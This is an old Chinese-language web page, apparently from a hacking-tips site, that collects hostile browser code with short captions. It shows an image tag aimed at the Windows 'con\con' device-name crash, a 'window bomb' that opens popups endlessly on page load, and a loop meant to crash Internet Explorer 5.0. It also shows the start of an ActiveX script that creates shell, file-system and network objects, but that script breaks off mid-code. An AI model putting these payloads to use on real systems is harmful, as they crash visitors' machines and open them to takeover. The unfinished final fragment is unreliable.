</html>
<HTML> <BODY> <IMG SRC="c:\con\con"> <!-- or nul\nul, clock$\clock$ --> <!-- or aux\aux, config$\config$ --> </BODY> </HTML>
————————> 视窗炸弹
<HTML> <HEAD> <TITLE>f\*\*k USA</TITLE> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> </HEAD> <BODY onload="WindowBomb()"> <SCRIPT LANGUAGE="java script">
function WindowBomb() { var iCounter = 0 // dummy counter
while (true) { window.open("http://i50.126.com","CRASHING" + iCounter,"width=1,height=1,resizable=no") iCounter++ } }
</script> </BODY>
</HTML>
————————> 造成IE 5.0崩溃的代码
<HTML> <BODY> <script> var color = new Array; color[1] = "black"; color[2] = "white"; for(x = 0; x <3; x++) { document.bgColor = color[x] if(x == 2) { x = 0; } } </SCRIPT> </BODY> </HTML>
————————> 进入WINDOWS 之前弹出来的对话框代码 到注册表找到 LegalNoticeCaption , LegalNoticeText 删除
<SCRIPT language=java script>document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){ try { //ActiveX initialization a1=document.applets[0]; a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); a1.createInstance(); Shl = a1.GetObject(); a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}"); a1.createInstance(); FSO = a1.GetObject(); a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}"); a1.createInstance(); Net = a1.GetObject();
try { if (documents .cookie.indexOf("Chg") == -1)
上一篇:Linux Apache Web 服务器终极教程
下一篇:绝地反击反黑纪实
|